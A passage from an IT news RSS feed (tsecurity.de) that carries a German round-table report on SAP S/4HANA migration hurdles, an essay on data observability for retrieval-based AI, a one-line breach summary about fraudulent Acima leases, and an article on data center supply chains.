<link>https://tsecurity.de/de/3687936/it-security-nachrichten/sap-s4hana-transformation-zwischen-aufbruch-und-realitaet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687936/it-security-nachrichten/sap-s4hana-transformation-zwischen-aufbruch-und-realitaet/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/shutterstock_2443989867_16x9.png?w=1024" alt="ERP SAP Studie 27" class="wp-image-4199877" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie</p>.</figcaption></figure><p class="imageCredit">hasan as’ari – shutterstock.com</p></div>



<p class="wp-block-paragraph">SAP-Anwenderunternehmen stehen unter Druck, auf SAP S/4HANA zu wechseln, weil die Mainstream-Wartung für SAP ERP (SAP ECC 6.0) Ende 2027 ausläuft und die bis Ende 2030 geltende erweiterte Wartung kostenpflichtig ist.</p>



<p class="wp-block-paragraph">Zwar stellt SAP mit der „<a href="https://www.computerwoche.de/article/3816544/sap-kommt-kunden-entgegen.html">SAP ERP, Private Edition, Transition Option</a>“ eine weitere Wartungsverlängerung bis 2033 in Aussicht. Da diese einer Neuimplementierung gleichkommt, bleibt SAP-Kunden mehr Zeit für die Planung, die Analyse und das Changemanagement. Der Nachteil: Wer diese Option nutzt, läuft Gefahr, technologisch ins Hintertreffen zu geraten, da Innovationen nahezu ausschließlich für SAP S/4HANA bereitgestellt werden.</p>



<h2 class="wp-block-heading">Zögerliche SAP-S/4HANA-Transformation trotz Wartungsdruck</h2>



<p class="wp-block-paragraph">Obwohl der Druck hoch ist, hat eine große Zahl der SAP-Bestandskunden die Transformation auf die seit 2015 verfügbare ERP-Suite offenbar noch nicht vollzogen. Eine COMPUTERWOCHE-Expertenrunde zeigte, wo die größten Hürden liegen und was erfolgreiche Projekte auszeichnet.</p>



<p class="wp-block-paragraph">Warum etliche Unternehmen die Transformation vor dem regulären Wartungsende scheuen und stattdessen zwei Prozent Mehrkosten für die erweiterte Wartung einkalkulieren, brachte ein Teilnehmender auf den Punkt: Firmen haben über Jahrzehnte in ihre SAP-ERP-Lösung investiert und sie an individuelle Prozessanforderungen angepasst, damit die Abläufe entlang der Supply Chain reibungslos laufen. Er habe daher in den vergangenen zehn Jahren keinen Kunden erlebt, der freiwillig umsteigen wollte. Alle hätten gesagt, dass sie müssen.</p>



<p class="wp-block-paragraph">Nach Erfahrungswerten eines weiteren Experten nutzen erst rund 20 Prozent der SAP-Kunden SAP S/4HANA als Kernapplikation produktiv, unter anderem, weil entsprechende Transformationsprojekte auf sieben bis neun Jahre angelegt sind.</p>



<h2 class="wp-block-heading">Altlasten bremsen die SAP-S/4HANA-Transformation</h2>



<p class="wp-block-paragraph">Unternehmen, die sich für den Wechsel entscheiden, verzichten häufig auf jede Modernisierung. Sie vollziehen einen Eins-zu-eins-Umstieg ohne Code-Modifikation, sei es in Form einer System Conversion (Brownfield-Ansatz) oder per Lift and Shift in SAP Cloud ERP Private (früher: SAP S/4HANA Cloud Private Edition). Dabei ist eine große Zahl von SAP-ERP-Installationen gar nicht zukunftsfähig, weil sie auf Prozessen aus den 1990er Jahren basieren und im Lauf der Jahre durch zahlreiche Eigenentwicklungen erweitert wurden.</p>



<p class="wp-block-paragraph">Nicht selten gibt es bis zu mehrere tausend kundeneigene Programme im Z/Y-Namensraum, die zum Teil nicht mehr genutzt werden und das System unnötig belasten. Die Experten waren sich einig, dass eine solche rein technische Migration, bei der Altlasten wie ABAP-Eigenentwicklungen mitgeschleppt werden, keinen Mehrwert für das Unternehmen bringt.</p>



<p class="wp-block-paragraph">Es muss geprüft werden, welche Eigenentwicklungen beibehalten werden, weil sie wettbewerbsdifferenzierend und damit geschäftskritisch sind, und welche gelöscht werden müssen, weil sie nicht genutzt werden oder weil es dafür inzwischen SAP-Standardfunktionen gibt. Handlungsbedarf besteht auch bei einer dreistelligen Anzahl von Buchungskreisen, von denen niemand weiß, welche noch benötigt werden, oder bei zahlreichen Dubletten in den Kreditoren- und Debitorenstammdaten.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Studie “SAP S4HANA”: Sie können sich noch beteiligen!</strong></td></tr><tr><td>Zum Thema SAP S4HANA führt die COMPUTERWOCHE derzeit eine Multi-Client-Studie unter IT-Verantwortlichen durch. Haben Sie Fragen zu dieser Studie oder wollen Partner bei dieser Studie werden, helfen wir Ihnen unter <a href="mailto:research-sales@foundryco.com" target="_blank" rel="noreferrer noopener">research-sales@foundryco.com</a> gerne weiter. </td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Migrations-Tools und KI-Agenten beschleunigen den Umstieg</h2>



<p class="wp-block-paragraph">Um diesen Prüf- und Bereinigungsaufwand zu bewältigen, bietet SAP mehrere Tools, um die Transformation auf SAP S/4HANA zu vereinfachen: darunter SAP Activate, SAP Cloud ALM, Migration Cockpit, Readiness Check, Custom-Code-Check oder Modifikationsabgleich. Ergänzt werden sie durch Lösungen wie Signavio für die Prozessanalyse. Die Experten schätzen den Effizienzgewinn durch solche Migrationswerkzeuge auf 30 bis 50 Prozent.</p>



<p class="wp-block-paragraph">Zusätzliche Produktivität versprechen KI-Agenten, die Altsysteme automatisiert analysieren, Code bereinigen und Datenflüsse transformieren. Das reduziert den Migrationsaufwand und beschleunigt den Umstieg.</p>



<h2 class="wp-block-heading">Scope-Management als Schlüssel für den Projekterfolg</h2>



<p class="wp-block-paragraph">Einig waren sich die Teilnehmenden, dass SAP-S/4HANA-Transformationsprojekte in der Regel nicht an der Technologie scheitern, sondern an einer mangelhaften Scope-Definition und am unzureichenden Changemanagement.</p>



<p class="wp-block-paragraph">Ein Scope-Management vor dem Projektstart, das berücksichtigt, wie viel Veränderung der IT-Organisation und den Fachbereichen zugemutet werden kann, sei essenziell für den Erfolg, sagte einer der Teilnehmenden. Es erfordert die Fähigkeit zu priorisieren und ein iteratives Vorgehen, bei dem zunächst geschäftskritische Must-haves und Quick Wins umgesetzt werden. Weniger wichtige Nice-to-haves folgen später. Wer dagegen in der Konzeptionsphase bereits den großen Wurf anstrebt, wird voraussichtlich scheitern. Als Beispiel wurde der direkte Umstieg auf ein SAP-S/4HANA-Kernsystem genannt, das nach dem Clean-Core-Ansatz von nicht mehr lauffähigen Programmen und obsoleten Erweiterungen bereinigt ist.</p>



<p class="wp-block-paragraph">Genauso wichtig ist ein Change-Management, das Mitarbeitende von Beginn an einbezieht, die nötige Akzeptanz schafft und vom Top-Management aktiv unterstützt wird, sowie eine verbindliche Governance mit klaren Zielvorgaben. Unverzichtbar ist auch die Einbindung der Fachbereiche. Sie stellt die größte Herausforderung dar, da Unternehmen befürchten, dass durch die SAP-S/4HANA-Transformation zu viele personelle Ressourcen gebunden werden, die dann für Kernaufgaben fehlen. Kommt es vor, dass IT und Fachbereiche als Antipoden agieren, sollte ein Change-Coach als Vermittler eingesetzt werden.</p>



<h2 class="wp-block-heading">Hybride Betriebsmodelle setzen sich langfristig durch</h2>



<p class="wp-block-paragraph">Bereits vor dem Projektstart muss abschließend geklärt sein, welches Betriebsmodell für SAP S/4HANA am besten zu einem Unternehmen und seinen Zielen passt, auch mit Blick auf regulatorische Anforderungen. Das ist häufig nicht der Fall, sodass das Projektteam unnötig Zeit damit verbringt, das passende Betriebsmodell zu ermitteln. Das bremst Transformationsvorhaben aus.</p>



<p class="wp-block-paragraph">Nach Ansicht eines Teilnehmenden wird sich langfristig ein hybrides Betriebsmodell durchsetzen, bei dem der SAP-Kunde entscheidet, welche Elemente der SAP-S/4HANA-Landschaft in einer Hyperscaler-Cloud, einer souveränen Cloud und/oder On-Premises laufen. Eine weitere, weitgehend unbekannte Möglichkeit ist der Betrieb im Rahmen der Customer-Data-Center-Option (CDC) von SAP Cloud ERP Private (früher: SAP S/4HANA Cloud Private Edition), die aus Gründen wie Datenschutz, Leistung und Souveränität eine interessante Alternative sein kann.</p>



<p class="wp-block-paragraph">Mehrere Experten stellen darüber hinaus fest, dass die vollwertige SaaS-Lösung SAP Cloud ERP Public (früher: SAP S/4HANA Cloud Public Edition) inzwischen verstärkt eingesetzt wird. Sie stellt vorkonfigurierte Kern-ERP-Funktionen (Best Practices) bereit und lässt sich relativ schnell einführen, ermöglicht aber kaum individuelle Anpassungen. Diese Abstriche nehmen Unternehmen in Kauf, um von regelmäßigen, automatischen Upgrades und technologischen Innovationen zu profitieren.</p>



<p class="wp-block-paragraph">Kritisiert wurde allerdings, dass die Cloud-Diskussion häufig unter begrifflichen Unschärfen leidet. So macht der Betrieb von SAP S/4HANA in einer Hyperscaler- oder SAP-Cloud die Lösung noch lange nicht zum Software-as-a-Service-Angebot. Solche Ungenauigkeiten irritierten SAP-Kunden und bremsten die Entscheidungsfindung. Letztlich sind beim Cloud-Betrieb auch die Kosten entscheidend. Zwar wollen viele Unternehmen anfangs maximale Sicherheit mit Private Network und Confidential Computing, wählen dann aber günstigere Commercial-Cloud-Angebote. Ausnahmen bilden regulierte Branchen und der öffentliche Sektor.</p>



<p class="wp-block-paragraph">Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie, sondern auch, wie diszipliniert Scope und Wandel im Unternehmen gesteuert werden.</p>



<h2 class="wp-block-heading">Teilnehmer der Round-Table “SAP S4HANA 2027”</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Albrecht-Munz-HPE_169.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Albrecht Munz, HPE" class="wp-image-4199942" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Albrecht Munz, HPE: </p> <p>„Die SAP-S/4HANA-Migration ist primär ein erster technischer Pflichtlauf, der die IT seitige Grundlage für die digitale Transformation schaffen kann. Dass viele Unternehmen hier stagnieren, liegt auch am in diesem Zusammenhang häufig anzutreffenden Cloud-Washing: Das Hosting eines ERP-Systems in der Cloud liefert noch lange nicht die Innovations- und Business-Effekte einer wirklich Cloud-nativen SaaS-Architektur.“</p></figcaption></figure><p class="imageCredit">Harald Becker / Hewlett-Packard GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/01/Anke-Frier_LHIND_TESTIMONIALS_030_16x9.png?w=1024" alt="Anke Frier, Lufthansa Industry Solutions " class="wp-image-3634299" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Anke Frier, Lufthansa Industry Solutions:</p>
<p>„Unternehmen, die sich für eine technische SAP-S/4HANA-Transformation entschieden haben, dürfen diese nicht mit dem Go-Live als abgeschlossen betrachten. Der langfristige Erfolg hängt davon ab, wie konsequent danach die neuen technologischen Möglichkeiten genutzt werden, um Prozesse umzugestalten, zu digitalisieren und durch KI-Einsatz zu unterstützen. Erst dadurch entsteht ein messbarer Business Value.“</p></figcaption></figure><p class="imageCredit">Sonja Brüggemann / Lufthansa Industry Solutions GmbH &amp; Co. KG</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Peter_Buermann_Microsoft_16x9.png?w=1024" alt="Peter Büermann, Microsoft" class="wp-image-4199948" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Peter Büermann, Microsoft:</p>
<p>„Der optimale Zeitpunkt für den Umstieg auf SAP S/4HANA ist jetzt. Die Reife der Migrationswerkzeuge, standardisierte Vorgehensmodelle und die umfangreiche Projekterfahrung der SAP-Partnerlandschaft reduzieren das Risiko deutlich. Damit sind die wesentlichen Hürden vergangener Jahre weitgehend beseitigt und Unternehmen profitieren von einer schnelleren Implementierung, geringeren Kosten und einer höherer Projektqualität.“</p>
</figcaption></figure><p class="imageCredit">Microsoft Deutschland GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Roland_Storbeck_Natuvion_090726_285_16x9.png?w=1024" alt="Roland Storbeck, Natuvion" class="wp-image-4199949" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Roland Storbeck, Natuvion:</p>
<p>„Wirklich erfolgreich sind die SAP-S/4HANA-Migrationen, deren Scope noch vor dem Projektstart klar definiert und gemanagt wird. Wer zu Beginn zu hohe Ansprüche hat und jeden Prozess umdrehen will, dessen Vorhaben scheitert häufig schon in der Konzeptionsphase. Zudem muss jedes Unternehmen die Frage beantworten, wie viel Change seine IT- und Business-Organisation überhaupt verträgt. Neben einem klaren Scope ist dringend zu empfehlen, den eigenen Datenbestand vor Projektstart zu analysieren und aufzuräumen.“</p>
</figcaption></figure><p class="imageCredit">VOGUS – Wolfgang Voglhuber / Natuvion GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Matthias-Draschner_smartshift.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Matthias Draschner, smartShift" class="wp-image-4199950" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Matthias Draschner, smartShift:</p>
<p>„Für viele Unternehmen ist SAP in erster Linie eine über Jahre oder sogar Jahrzehnte gewachsene IT-Landschaft, die geschäftskritische Prozesse unterstützt und absichert. Entsprechend besteht die berechtigte Erwartung, dass diese Prozesse auch nach der Migration auf SAP S/4HANA zuverlässig und möglichst unverändert weiterlaufen. Gleichzeitig bietet die SAP-S/4HANA-Transformation die Chance, Custom Code entweder zu modernisieren und auf die Anforderungen einer Cloud-fähigen Architektur auszurichten oder zu entfernen, sofern er nicht mehr benötigt wird. Spezielle Analyse- und Automatisierungstools unterstützen diesen Prozess.“</p>
</figcaption></figure><p class="imageCredit">smartShift Technologies GmbH</p></div>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Upbound says hack caused $13 million in fraudulent Acima leases]]></title>
<description><![CDATA[The Upbound Group fintech company disclosed that threat actors who stole data from its systems leveraged it to create $13 million in Acima leases. [...]]]></description>
<link>https://tsecurity.de/de/3687678/it-security-nachrichten/upbound-says-hack-caused-13-million-in-fraudulent-acima-leases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687678/it-security-nachrichten/upbound-says-hack-caused-13-million-in-fraudulent-acima-leases/</guid>
<pubDate>Wed, 22 Jul 2026 23:58:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Upbound Group fintech company disclosed that threat actors who stole data from its systems leveraged it to create $13 million in Acima leases. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents aren't confidently wrong because of bad context — they're wrong because of bad data engineering]]></title>
<description><![CDATA[You spend weeks tuning an AI chatbot. Answers are accurate. Stakeholders sign off, and you ship it. Three months later, the system is confidently wrong about a third of what users ask. Nobody changed the model, and nobody touched the prompts. The world moved, pricing changed, a policy updated, a ...]]></description>
<link>https://tsecurity.de/de/3687580/it-nachrichten/ai-agents-arent-confidently-wrong-because-of-bad-context-theyre-wrong-because-of-bad-data-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687580/it-nachrichten/ai-agents-arent-confidently-wrong-because-of-bad-context-theyre-wrong-because-of-bad-data-engineering/</guid>
<pubDate>Wed, 22 Jul 2026 22:58:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>You spend weeks tuning an AI chatbot. Answers are accurate. Stakeholders sign off, and you ship it. Three months later, the system is confidently wrong about a third of what users ask. Nobody changed the model, and nobody touched the prompts. The world moved, pricing changed, a policy updated, a product spec shipped a new version, and the underlying knowledge store didn't move with it.</p><p>This is not a hypothetical. It's one of the most common production failure modes in enterprise AI right now, and most data engineering teams don't have the right tooling to catch it, regardless of how the AI system retrieves the data.</p><h2>The failure that doesn't look like a failure </h2><p>An AI application doesn't care whether it's retrieving from a vector store, a document index, or an API call. Whatever the mechanism, nothing in a standard retrieval pipeline checks whether what it's serving is still correct. A stale pricing document retrieves just as confidently as a current one, because the system is scoring relevance or availability, not correctness. A record with a silently missing field passes through just as cleanly as a complete one, for the same reason.</p><p>So the failure is invisible by design. Outdated or incomplete data still scores high on relevance, or passes every check a data pipeline was built to run. The model answers with full confidence because the retrieved context looks authoritative. Every dashboard you're watching stays green. The system looks like it's working. It's just wrong.</p><p>I’ve watched a similar version of this happen outside the AI context, in a fintech pipeline. An upstream system changed a field without notifying downstream users. The pipeline did not fail; it simply propagated bad values into dashboards because the system only checked whether the job completed, not whether the data was still correct. The issue surfaced only when a customer noticed something inconsistent. By then, the bad data had already moved downstream. </p><p>Whether it's a document that's gone stale or a field that's gone silently missing, the failure shape is the same: the absence of an error is not the presence of correctness, and without building proper validation layers, nothing in the pipeline could identify the problem.</p><h2>Why this is a data engineering problem</h2><p>Teams that hit this failure tend to misdiagnose it, and they tend to do it twice.</p><p><b>Blaming the model: </b>The first instinct is to blame the model, try a different LLM, adjust the prompt. The real problem lies further upstream, at the data engineering layer, the same instinct behind the fintech failure above: monitoring built for the pipeline, not the data.</p><p><b>Blaming the retrieval layer: </b>Once the model's ruled out, the next instinct is to blame the retrieval or context layer instead and buy a better one. The timing isn't a coincidence: as enterprises push these systems into the real production world, this gap is exactly what's starting to surface, and the vendor response has been everywhere. </p><ul><li><p>AWS just<a href="https://venturebeat.com/data/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation"> entered the "context layer" race</a> with a knowledge graph that learns from agent usage. </p></li><li><p>Snowflake's new Horizon Context and Cortex Sense target the exact symptom<a href="https://venturebeat.com/data/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem"> this piece opened with</a>: agents giving confident wrong answers because nothing governs the business logic underneath them. </p></li></ul><p>Both are real responses to a real problem, but they sit one layer above it; a knowledge graph still depends on whatever feeds it.</p><p>The real problem lies further upstream, at the data engineering layer. Teams check whether a job ran, not whether the data it moved is still true, an instinct that predates AI by years. Monitoring is built for the pipeline, not for the data. </p><h2>What's actually missing: Data observability</h2><p>Data observability is a well-known concept that doesn't get enough attention in how it's actually implemented. The relevant metric isn't a percentage — it's coverage: what fraction of critical datasets have lineage that's actually queryable, versus only living in someone's head.</p><p>Uber built a <a href="https://www.uber.com/in/en/blog/operational-excellence-data-quality/">dedicated data quality and observability platform</a> long before retrieval-augmented generation existed. Their Unified Data Quality platform supports more than 2,000 critical datasets and detects around 90% of data quality incidents before they reach downstream consumers.</p><p>Netflix solved a different piece of the same problem, <a href="https://netflixtechblog.com/building-and-scaling-data-lineage-at-netflix-to-improve-data-infrastructure-reliability-and-1a52526a7977">building a company-wide data lineage system</a> so anyone could answer where a dataset came from and what touched it along the way. It maps dependencies across Kafka topics, ML models, and experimentation, not just warehouse tables. Similar to Uber, the platform was built for humans and now it has become more important with the rise in AI/LLM applications.</p><p>Between them, Uber and Netflix cover two of the four things worth building for. In practice, I think about it as four dimensions, each measurable on its own terms.</p><p><b>Correctness:</b> Does each record conform to the shape and rules it's supposed to, right field types, no unexpected nulls, values in range. Tools like<a href="https://greatexpectations.io/"> Great Expectations</a> and <a href="https://soda.io/">Soda</a> handle this well: automated row and column-level validation instead of manual checks after something breaks. Track percentage of records passing validation per run.</p><p><b>Freshness:</b> Is the data still current relative to its source, not just current as of its last check. Track time since last successful update per source, with an SLA per dataset rather than one blanket threshold, since some sources need hourly refresh and others don't.</p><p><b>Consistency:</b> Does the same fact read the same way everywhere it's stored or indexed. This fails silently, it only shows up when two systems fed by the same source start disagreeing. A periodic cross-check between downstream destinations, flagging mismatch rate above a threshold, is enough to catch it early.</p><p><b>Lineage:</b> Can you trace any output back to its source and every transform it passed through, the same question Netflix built its system to answer. </p><p>None of this requires infrastructure most data teams don't already have. I know because I've built it, not just argued for it.</p><p>At <a href="https://www.socure.com/">Socure</a>, client data arrived in whatever shape the client felt like sending it, and occasionally, quietly wrong. The challenge was building a system where incorrect data could be identified before it propagated downstream. The same principles applied: Validate what arrived, understand where it came from, and prevent bad data from becoming someone else's problem.</p><p>Great Expectations became part of that foundation: schema and range validation at ingestion, per-source SLAs for freshness, cross-system checks for consistency, and file-level lineage. All of it sat behind a <a href="https://aws.amazon.com/blogs/big-data/build-write-audit-publish-pattern-with-apache-iceberg-branching-and-aws-glue-data-quality/">write-audit-publish</a> pattern, where data landed in staging, was validated, and only moved downstream if it passed the required checks.</p><p>The result showed up downstream: better accuracy across the board, in reporting, in the ML models, and in AI retrieval built on top of that same data.</p><h2>What to do Monday morning</h2><p>If you're running retrieval-based AI systems in production, the diagnostic question isn't which model to try next or which retrieval architecture to migrate to. It's four narrower questions: </p><ul><li><p>Is the underlying data validated against the standards required by its consumers?</p></li><li><p>What's the oldest piece of content currently being served with high confidence?</p></li><li><p>Would two chunks of the same source ever disagree with each other in the same retrieval result?</p></li><li><p>Could you trace where it came from if it turned out to be wrong?</p></li></ul><p>If you can't answer those questions, then the gap lies in the pipeline between your source systems and whatever your agent reads from. That’s a data engineering fix, not a model swap or a vendor migration.</p><p>Whether you're building reporting pipelines, ML systems, or AI agents, correctness, freshness, consistency, and lineage are what make data trustworthy. AI simply exposes weaknesses that have existed in data engineering all along. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why ‘workforce orchestrator’ is the next hot job]]></title>
<description><![CDATA[Designing and directing mixed human and agentic teams may be key to conducting the future of work]]></description>
<link>https://tsecurity.de/de/3687064/ai-nachrichten/why-workforce-orchestrator-is-the-next-hot-job/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687064/ai-nachrichten/why-workforce-orchestrator-is-the-next-hot-job/</guid>
<pubDate>Wed, 22 Jul 2026 18:49:19 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Designing and directing mixed human and agentic teams may be key to conducting the future of work]]></content:encoded>
</item>
<item>
<title><![CDATA['AI is an enormous tailwind for software companies': 5 tips for adapting to the new 'SaS' model]]></title>
<description><![CDATA[Here's what people are getting wrong about the so-called SaaS apocalypse.]]></description>
<link>https://tsecurity.de/de/3686826/hacking/ai-is-an-enormous-tailwind-for-software-companies-5-tips-for-adapting-to-the-new-sas-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686826/hacking/ai-is-an-enormous-tailwind-for-software-companies-5-tips-for-adapting-to-the-new-sas-model/</guid>
<pubDate>Wed, 22 Jul 2026 17:22:45 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Here's what people are getting wrong about the so-called SaaS apocalypse.]]></content:encoded>
</item>
<item>
<title><![CDATA[The $3 trillion assembly line: Why CIOs must industrialize the data center supply chain]]></title>
<description><![CDATA[You are one of the six billion people (75% of the world population) online today, and every click you make is routed through the data center. Data centers, whether knowingly or unknowingly, play a very critical role in your daily online activities. With an increasing population, increasing usage ...]]></description>
<link>https://tsecurity.de/de/3686216/it-nachrichten/the-3-trillion-assembly-line-why-cios-must-industrialize-the-data-center-supply-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686216/it-nachrichten/the-3-trillion-assembly-line-why-cios-must-industrialize-the-data-center-supply-chain/</guid>
<pubDate>Wed, 22 Jul 2026 14:04:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph">You are one of the six billion people (75% of the world population) online today, and every click you make is routed through the data center. Data centers, whether knowingly or unknowingly, play a very critical role in your daily online activities. With an increasing population, increasing usage of online presence, and now omniscient AI, the demand for data centers has increased manyfold, and the trend seems similar to the year 2000, when telephone towers were built to accommodate increased digital presence.</p>



<p class="wp-block-paragraph">To win the AI race, Hyperscalers (Google, Meta, Amazon, Microsoft, Alibaba, Oracle, IBM, Tencent) are spending huge amounts of money on data center development. In the USA, the hyperscalers are planning to spend <a href="https://finance.yahoo.com/news/big-tech-set-to-spend-650-billion-in-2026-as-ai-investments-soar-163907630.html">$650 billion in 2026, which is around 70% higher than 2025 spending</a>, according to Yahoo Finance.</p>



<p class="wp-block-paragraph">As per McKinsey research, by 2030, companies will invest around $7 trillion in Capex on data center infrastructure globally. More than $4 trillion will go towards computing hardware investment. More than 40% of this spending will be invested in the United States.</p>



<h2 class="wp-block-heading">Demand growth in data centers</h2>



<p class="wp-block-paragraph">McKinsey analysis shows that global demand for data center capacity can more than triple by 2030, with a compound annual growth rate (CAGR) of around 22 per cent. In the USA, data center demand could grow by 20-25 per cent at the same time.  </p>



<p class="wp-block-paragraph">The data center industry is currently undergoing a violent transition. We are moving away from the era of “bespoke projects” — where every facility was a unique architectural feat — into an era of industrialized infrastructure. With global capital expenditure in the sector projected to hit $3 trillion by 2028, the “bottleneck” has shifted. It is no longer about securing the capital; it is about the physics of the supply chain.</p>



<p class="wp-block-paragraph">During my tenure at Vantage, managing the intersection of data center construction management (DCCM) and infrastructure management (DCIM), I saw firsthand that the most successful players aren’t those with the deepest pockets, but those with the most integrated data threads. If your construction data in Procore doesn’t talk to your financial reality in Yardi, or your operational capacity in DCIM, you aren’t building a data center — you’re managing a $500 million blind spot.</p>



<h2 class="wp-block-heading">The death of “sticks and bricks”</h2>



<p class="wp-block-paragraph">Traditionally, data center construction was treated as civil engineering. But for the modern CIO, a data center is a complex product assembly.</p>



<p class="wp-block-paragraph">The challenges are systemic. We are facing 50-to-80-week lead times for critical “long-pole” items: extra-high-voltage transformers, switchgear, and the liquid cooling manifolds required for the next generation of AI chips. In this environment, the traditional reactive supply chain model is a liability.</p>



<p class="wp-block-paragraph">To survive the $3 trillion inflow, we must adopt a hybrid-agile SCOR (supply chain operations reference) model. This means applying continuous flow logic to standardized components (like modular power skids) while maintaining agile responsiveness for the volatile IT layer.</p>



<h2 class="wp-block-heading">The digital bridge: Construction management software  to ERP</h2>



<p class="wp-block-paragraph">The most significant opportunity for CIOs lies in financial-operational integration. In many organizations, there is a data chasm between the construction site and the corporate office. Construction teams live in the construction management software tracking tasks, trades, RFIs and payment submittals. Finance teams operate corporate offices with project management tools (worth remembering that email is a key tool besides spreadsheets and phone calls) tracking capex schedule, commissioning timeline, capital drawdowns and asset lifecycle management.</p>



<p class="wp-block-paragraph">These systems are siloed; the CIO loses visibility into the total cost to serve. By integrating construction management into the financial system, we create real-time financial visibility of the build. We can see exactly how a three-week delay in a chiller delivery impacts the internal rate of return (IRR) of the entire asset. This isn’t just accounting; it’s strategic telemetry.</p>



<h2 class="wp-block-heading">From BIM to DCIM: The lifecycle thread</h2>



<p class="wp-block-paragraph">The second bridge is the handoff from construction (BIM) to operations (DCIM). Historically, this handoff was a nightmare of PDFs and Excel sheets. By the time the operations team took the keys, the “as-built” design information was already out of date.</p>



<p class="wp-block-paragraph">The opportunity today is to maintain a continuous data thread. The sensor data and asset tags established during the “make” phase in our SCOR model should flow directly into the DCIM. This allows us to perform virtual commissioning. Before a single server is racked, we should already have a digital replica of the airflow, power distribution, and cooling capacity.</p>



<h2 class="wp-block-heading">The scientific inference: AI in the supply chain</h2>



<p class="wp-block-paragraph">As someone who has led data and AI initiatives, I’ve seen the hype. But in the supply chain, the application of AI must be pragmatic, not generative. We don’t need AI to write poems; we need it for predictive procurement. Most organizations manage their procurement in ERP or a mix of a few tools to manage the source-to-settle business flow. Adopting a system workflow improves data collection and the state of the procurement cycle, which in turn provides AI with the context to draw inferences for possible delays and anomalies in original specifications and change orders.</p>



<p class="wp-block-paragraph">By applying machine learning to global logistics data, we can move from just-in-time to just-in-case modeling. AI can analyze geopolitical risks, shipping lane congestion, and raw material pricing to tell a CIO: <em>“Order your switchgear 14 months early, or your Q3 2027 ‘Power On’ date is at risk.”</em></p>



<h2 class="wp-block-heading">Bringing it all together: AI in the supply chain and finance</h2>



<p class="wp-block-paragraph">Why it matters: Approximately 70% of the capex is on this workflow and making timely decisions that directly impact the ready-for-service dates. The current challenge of reactionary adjustment in design to procurement to local fit-out is a significant drain on capex efficiency and cost of capital. Because single-project delivery delays have become so volatile, a massive structural shift is occurring in how digital infrastructure is funded. Single-project debt (special purpose vehicles or SPVs) is facing severe friction. To insulate themselves from RFS shocks, the largest institutional players are moving toward permanent platform capital — aggregating exposure across dozens of global assets simultaneously.</p>



<p class="wp-block-paragraph">Navigating these complex multi-billion-dollar engineering projects distributed over a large geography is simply unmanageable without rethinking and re-engineering existing tools and processes.</p>



